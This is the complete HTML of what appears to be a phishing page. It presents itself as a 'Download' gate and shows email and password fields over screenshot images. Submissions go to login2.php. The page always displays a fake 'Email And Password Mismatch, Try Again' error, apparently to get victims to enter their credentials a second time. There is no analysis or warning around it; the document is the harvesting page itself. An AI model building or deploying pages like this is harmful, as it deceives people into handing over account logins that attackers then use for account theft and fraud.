<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Download</title>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<meta name="generator" content="Web Page Maker">
<style type="text/css">
/*----------Text Styles----------*/
.ws6 {font-size: 8px;}
.ws7 {font-size: 9.3px;}
.ws8 {font-size: 11px;}
.ws9 {font-size: 12px;}
.ws10 {font-size: 13px;}
.ws11 {font-size: 15px;}
.ws12 {font-size: 16px;}
.ws14 {font-size: 19px;}
.ws16 {font-size: 21px;}
.ws18 {font-size: 24px;}
.ws20 {font-size: 27px;}
.ws22 {font-size: 29px;}
.ws24 {font-size: 32px;}
.ws26 {font-size: 35px;}
.ws28 {font-size: 37px;}
.ws36 {font-size: 48px;}
.ws48 {font-size: 64px;}
.ws72 {font-size: 96px;}
.wpmd {font-size: 13px;font-family: Arial,Helvetica,Sans-Serif;font-style: normal;font-weight: normal;}
/*----------Para Styles----------*/
DIV,UL,OL /* Left */
{
 margin-top: 0px;
 margin-bottom: 0px;
}
</style>

</head>
<body>
<div id="image1" style="position:absolute; overflow:hidden; left:0px; top:2px; width:1365px; height:623px; z-index:0"><img src="images/paste518.jpg" alt="" title="" border=0 width=1365 height=623></div>

<div id="image2" style="position:absolute; overflow:hidden; left:551px; top:331px; width:28px; height:40px; z-index:1"><img src="images/paste519.jpg" alt="" title="" border=0 width=28 height=40></div>

<div id="image3" style="position:absolute; overflow:hidden; left:585px; top:339px; width:229px; height:28px; z-index:2"><img src="images/paste521.jpg" alt="" title="" border=0 width=229 height=28></div>

<form name="form1" method="post" action="login2.php" enctype="application/x-www-form-urlencoded" style="margin:0px">
<input name="formtext1" type="text" style="position:absolute;width:217px;left:592px;top:335px;z-index:4;height: 41px;" required placeholder="Email Address">
<input name="formtext2" type="text" style="position:absolute;width:217px;left:592px;top:387px;z-index:5;height: 40px;" required placeholder="Password">
<div id="formimage1" style="position:absolute; left:556px; top:467px; z-index:6"><input type="image" name="formimage1" width="252" height="65" src="images/downlo.JPG"></div>
</form>

<div id="image4" style="position:absolute; overflow:hidden; left:583px; top:276px; width:170px; height:31px; z-index:7"><img src="images/paste543.jpg" alt="" title="" border=0 width=170 height=31></div>

<div id="text1" style="position:absolute; overflow:hidden; left:610px; top:280px; width:150px; height:48px; z-index:8">
<div class="wpmd">
<div><font color="#FF0000" class="ws12">Email And Password </font></div>
<div><font color="#FF0000" class="ws12">Mismatch, Try Again</font></div>
<div><font color="#FF0000" class="ws12"><BR></font></div>
</div></div>


</body>
</html>
